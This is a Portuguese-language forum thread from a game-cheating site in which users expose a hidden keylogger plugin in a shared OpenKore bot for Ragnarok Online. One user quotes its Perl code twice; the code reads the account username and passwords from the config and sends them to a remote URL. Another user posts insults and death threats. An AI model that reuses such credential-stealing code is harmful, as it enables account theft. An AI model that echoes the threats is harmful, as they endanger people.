Simpson~* 24 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 @kodag0 amigo, vc falo pra ele se espeçar melhor... eu tenho 4 conselhos pra vc tbm. 1- nao use palavras de baixo calão se vc quer ser respeitado ou levado a sério. (qnd eu li o seu post eu ri pra k7 pq imaginei vc falando aquilo) 2- apresente provas sobre o que vc está falando, se nao ninguem vai acreditar em vc, principalmente tendo criado a conta mes passado e tendo só 3 posts... 3- NAO USE CAPSLOCK NEM MUDE A PORRA DO TAMANHO DA LETRA ENQUANTO ESCREVE. FICA RIDICULO 4- nao coloque itens valiosos num bot, se vc for banido ou roubado vc perde tudo... pra q vc coloco 90kk no bot logo no primero dia de uso?? pediu pra ser roubado (isso se vc realmente estiver falando a verdade) agora algumas observaçoes: 1- vc pediu pra banir o cara, mas vc tbm merece ser banido por xingar no forum. acho que a puniçao é de uma semana mas nao tenho ctz 2- vc falo q o dono do tópico é gordo. como vc sabe se nunca viu ele O_O' ?? 3- quem te garante q n é ele que vai te dar uma surra se vcs se encontrarem da rua? nao estou defendendo o jorgenunis, mas sinceramente, vc ta precisando de umas aulas de convivio em sociedade e boas maneiras... (e olha q é um adolescente d 16 anos q ta falando isso heim...) @topic-------------------- aff, vo ter que analizar esse troço d novo... amanha eu digo se achei KL ou nao ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kodag0 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 Mano se você fosse roubado com os itens que eu estava você estaria da mesma forma ou pior... vi teu primeiro post vi que tu tinha pesquisado e não tinha achado KL e tal, fui na fé me ferrei, mas vou ferrar esse carinha tbm pq vai ser a ultima pessoa que ele vai roubar... pq niguem merece isso mano! Sou membro novo mesmo e dai? vai da uma de veterano pra cima de mim so pq sou novato no forum... brother não to pedindo pra vc acreditar ou não em mim... tenta a sorte ae e depois me fala o que ele roubou de vc! Não viria aqui a toa ne cara, esse jorge ai é um filho da puta fudido mesmo e merece morrer! GALERA DE BOA CUIDADO, BAIXEM OUTRO MAS NÃO TENTEM ESSE... TO DANDO UM CONSELHO QUEM QUISER OUVI-LO DE BOA MAS QUE NÃO QUISER BOA SORTE! Brother eu não respeito ladrãoooooo, foi bom esse fdp não ter botado a localização dele no perfil se não eu mandaria botar ele no inferno aonde ele tivesse! Jorgenunis pau no cu do caralho ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Simpson~* 24 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 me desculpe se pareceu que eu falei aquilo como se eu fosse se superior a vc. nao é isso nao. eu nao falei aquilo pq vc é novo no fórum, é que tem 2 hackers aqui na webcheats que criam centenas de contas fakes pra incriminar bots honestos. por isso ninguem mais por aqui confia em pessoas com menos de 30 posts eu nao uso kores prontos, eu faço o meu próprio, justamente pra nao correr riscos. e otra, eu tbm ja fui roubado usando bot. perdi uns 50kk em equips (na epoca valia bem + q agr) e um set campal completo que eu peguei 75% dele honestamente o que eu fiz?? pensei: "eh, é isso que eu mereço por trapacear no jogo..." e nunca mais reclamei, pricipalmente pq nós aqui somos os "viloes" do rag. agente nao tá em posiçao de reclamar de nada... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
saruesley *-* 40 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 A casa caiu ladrãozinho É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Pasta plugins arquivo oculto OPKBRGuard(Reconnect) e não adianta nem querer mudar o link pois ja tirei print e tudo blz! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kodag0 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 Olha ai safado, espero que não ponha sua lozalização no seu perfil pq se você morar perto daqui eu mesmo vou aonde você vive e vou promover sua morte verme insolente. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Simpson~* 24 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 realmente, o KL está lá... @kodag0 vc falo que viu eu falando que o bot nao tinha kl e por isso baixou. vc esqueceu de ver a data de ediçao do tópico principal. eu falei q nao tinha kl no dia 30/01/12, o bot disponibilizado no post é do dia 01/02/12. sempre olhe a data de ediçao do post principal. qualquer comentario feito antes da ultima ediçao é quase que completamente inutil pq o dono do topico pode mudar qualquer coisa nele otra coisa, nao confie só no meu julgamento. eu tbm posso me enganar mas se nem eu, nem o saruesley nem o webopenkore acharmos nada, é provavel que nao tenha kl ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
korangar77 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 Po simpson e esse bot aqui é confiavel ? http://www.webcheats.com.br/forum/rag-cheats/1440589-openkore-funcionando-01-02-2012-atualizado.html E se não for vc bem que podia posta um bot pq tipo eu já mecho aqui a um tempinho e as duvidas que postei vc sempre respondeu e tal e vejo seus posts e eu acho tu um dos unicos confiaveis aqui . xD ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
johnmking 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 Aee galera esse openkore q esse baba noob postou estar com Keyloger e estar nos plugins, detalhe esta oculto!!!! o nome do plugin é "OPKBRGuard(Reconnect)" uma dica abra a pasta de plugins vai em Ferramentas>opções de pasta> procure a opção pastas e arquivos ocultos e selecione: Mostrar pastas e arquivos ocultos. Feito isso abra um bloco de notas e arraste tanto esse plugin qnto o resto e procure isso: use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); esse eh o famoso KL e esse safaddo qnto todos os outros q postaram q eu ja baixei todos e testei ESTÃO COM KL! CUIDADO Aee galera esse openkore q esse baba noob postou estar com Keyloger e estar nos plugins, detalhe esta oculto!!!! o nome do plugin é "OPKBRGuard(Reconnect)" uma dica abra a pasta de plugins vai em Ferramentas>opções de pasta> procure a opção pastas e arquivos ocultos e selecione: Mostrar pastas e arquivos ocultos. Feito isso abra um bloco de notas e arraste tanto esse plugin qnto o resto e procure isso: use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); esse eh o famoso KL e esse safaddo qnto todos os outros q postaram q eu ja baixei todos e testei ESTÃO COM KL! CUIDADO! Me desculpem ter postado em duplicata, naum sei oq aconteceu! Tirando a parte do KL esse openkore desse noob esta funfando sim... Espero ter ajudado e salvado a todos!!! tomem muito cuidado ao baixar esses openkores prontos, vem com manual e ateh os postadorem se oferencem pra tirar dúvidas..kkk. Que piada! MAIS UMA VEZ, FIQUEI DE ZÓIO ABERTOS! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jorgenunis 0 Postado 2 de Fevereiro 2012 Autor Compartilhar Postado 2 de Fevereiro 2012 eu peguei do bot brasil,não sabia disso vo arrumar pra vocês isso desculpe ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carlitoxx 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 Mano e se excluir esse arquivo ai, da pra usar de boa ? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jorgenunis 0 Postado 2 de Fevereiro 2012 Autor Compartilhar Postado 2 de Fevereiro 2012 Não sei,espera eu postar o kore belezinha ae vc usa ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
johnmking 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 tudo com KL! cara se tirar somente esta parte do plugin funfa sim, mas esse plugn e necessario ter para ele pode reconectar novamente caso desconecte. E essa de eu naum sabia e naum vi q tinha eh papo fiado! Se for, manolo vc perdeu véi e os caras da ond vc vc pegou esse openkore estao rindo de vc.. pq um cara q sab fazer uma confiuração e naum ver...... ta de sacanagem! Mas nu mais esta funcionado sim ateh o presente momento! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Simpson~* 24 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 @Carlitoxx nao da pra usar nao. o dono do botbrasil (araujorag) tem o costume de colocar KL em varios lugares diferentes. mesmo que tire esse arquivo ainda pode ter kl em outro ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jorgenunis 0 Postado 2 de Fevereiro 2012 Autor Compartilhar Postado 2 de Fevereiro 2012 eu peguei do bot brasil eu não tinha visto isso que era desse jeito,to arrumando um kore 100% aqui e vo postar,peço desculpas ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
deividduart 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 É amigos realmente tem KL, coloquei sem o cuidado de observar melhor e deu no que deu, inda bem que so perde um carteiro^^ , so queria fazer uma perguntinha a vocês que sempre ajudam tanto, sera que esse carinha ai não viu mesmo? E sera que alguem vai ter a coragem de baixa do post dele de novo? So acho que antes de repassa uma coisa a alguem temos que saber pelomenos o que tamos passando, merecia nominimo ban (so uma questão de opinião) ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carlitoxx 0 Postado 2 de Fevereiro 2012 Compartilhar Postado 2 de Fevereiro 2012 @Simpson~* Hm saquei vlw. @Tópico Alguém pode postar um ai sem KL ? Os que eu tenho fazer com ajuda dos tópicos daqui nunca dão certo =\ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kuran-sama 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 po cara, aki ta indo acho q até certo n sei direito primeira vez tentando fazer isso, mas tipo o meu start ro fecha do nd dando um erro la! o nome do erro é (version %s, %lu, %lu) alguem pode ajuda? '-' de preferencia tbm poderia dizer como eu faco para fazer com q ele va para certo ponto se morrer!? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Simpson~* 24 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 esse bot ta com kl. delete o seu bot e mude sua senha ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kuran-sama 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 shit! x_x' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jorgenunis 0 Postado 3 de Fevereiro 2012 Autor Compartilhar Postado 3 de Fevereiro 2012 So remover o plugin de relog ae fica 100%,ja verifiquei o bot todinho ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
saruesley *-* 40 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 A casa caiu ladrãozinho É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Pasta plugins arquivo oculto OPKBRGuard(Reconnect) e não adianta nem querer mudar o link pois ja tirei print e tudo blz! Mais pq esse hacker ainda ta aki? Ele ainda vem dar desculpa que não sabia que a botbrasil possui bot com kl... fala serio ne! Tem de ser muito inocente pra acreditar nessa! Bom eu fiz minha parte denunciei o kl que eu achei agora e com vcs decidirem se baixam ou não, se arriscam ou não usando esse kore! E quem e que garante que o kl desse bot esta somente na pasta plugins? Eu so dei uma olhada por cima nao fiz analise bem afundo pois estava e ainda estou sem tempo, sugiro que ngm baixem este kore no momento! Estranho desse topico ainda ta aberto! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kodag0 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 Não baixem o bot desse verme insolente mais uma vez estou falando que está com KL ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
joaofire 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 Afs O bot funfo mais só tem um problema eu tomei BLOCK!!! AFS tenho q cria otra conta q merd4 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carlitoxx 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 O fods é que quem posta bot com KL leva seculos para ser banido e quem faz uma parada legal leva ban em um piscar de olhos ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
diegopm07 0 Postado 3 de Fevereiro 2012 Compartilhar Postado 3 de Fevereiro 2012 Perdi minha jiboia por causa desse hacker ! Em kl ai nao baixem ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados